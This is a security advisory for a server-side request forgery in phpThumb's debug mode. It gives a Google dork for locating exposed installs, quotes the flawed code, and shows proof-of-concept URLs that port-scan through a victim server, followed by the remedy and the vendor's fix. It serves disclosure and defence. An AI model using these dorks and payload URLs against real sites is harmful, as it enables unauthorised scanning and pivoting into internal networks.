#phpThumb 'phpThumbDebug' Server Side Request Forgery
#Google Dork: inurl:phpThumb.php
#Author: Rafay Baloch And Deepanker Arora
#Company: RHA InfoSEC
#Impact: High
#Vendor: http://phpthumb.sourceforge.net/#download
#Version: 1.7.12
#Status: Reported And Fixed
===========
Description
===========
A server side request forgery is not a single vulnerability, however it
represents different classes of vulnerability. In a server side request
forgery an attaker creates forged packets to communicate with the
intra/internet by using the vulnerable server as a pivot point. Several
other different attacks can be performed, however we will keep it at a
basic level for a better understanding.
===========
Explanation
===========
The debug mode in phpThumb was introduced for trouble shooting purposes,
however the debug mode when turned can result in a server side request
forgery. By exploiting it a SSRF vulnerability an attacker may be able to
scan local or remote ports, fingerprint services etc. Let's take a look at
the piece of code responsible for fetching an external image:
if ($rawImageData = phpthumb_functions::SafeURLread($phpThumb->src, $error,
$phpThumb->config_http_fopen_timeout,
$phpThumb->config_http_follow_redirect)) {
$phpThumb->DebugMessage('SafeURLread('.$phpThumb->src.')
succeeded'.($error ? ' with messsages: "'.$error.'"' :
''), __FILE__, __LINE__);
$phpThumb->DebugMessage('Setting source data from URL
"'.$phpThumb->src.'"', __FILE__, __LINE__);
$phpThumb->setSourceData($rawImageData, urlencode($phpThumb->src));
} else {
$phpThumb->ErrorImage($error);
}
}
if ($rawImageData = phpthumb_functions::SafeURLread($_GET['src'], $error,
$phpThumb->config_http_fopen_timeout,
$phpThumb->config_http_follow_redirect)) {
$md5s = md5($rawImageData);
}
The above code is responsible for fetching an external image file with the
"src" parameter. The code doesn't checks if the image retrived is actually
a valid image. Therefore, under debug mode set to "True" it would display
the error message received from the lower layer network sockets which would
enable an attacker to launch a server side request forgery attack.
Furthurmore, I noticed that there was a validation being perfomed for
protocols such as file://.
if (preg_match('#^(f|ht)tp\://#i', $phpThumb->src)) {
However, this doesn't prevent this attack completly, as an attacker may be
able to leverage other protocols such as gopher://, dict:// etc in order to
exploit this vulnerability.
Proof of Concept
================
Scanme.nmap.org has known ports 22, 80 and 25 open, In case where the
server errors are turned on, there would be a distinct response by probing
open ports vs closed ports.
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:22&phpThumbDebug=9//
Open Port
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:80&phpThumbDebug=9//
Open port
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:1337&phpThumbDebug=9//
Closed port
Remedy
======
It is recommended to turn off the "debug" mode. The debug mode can be
modfying by changing the following lines inside the php code.
"$PHPTHUMB_CONFIG['disable_debug']= false;"
With:
"$PHPTHUMB_CONFIG['disable_debug']= true;".
Fix
===
1) The authors explicitly disabled all other protocols then http/https/ftp
protocols. This minimizes few of the attack vectors.
https://github.com/JamesHeinrich/phpThumb/commit/457a37d4a22ac9cdbbfe19577376622e58df81b0
2) The debug_mode has been disabled and the "High Security Mode" has been
enabled by default in version phpThumb 1.7.12. Take a look at the author's
note:
3) Further security improvements are to be done in the future versions.
References
==========
http://www.rafayhackingarticles.net/2013/11/phpthumb-server-side-request-forgery.html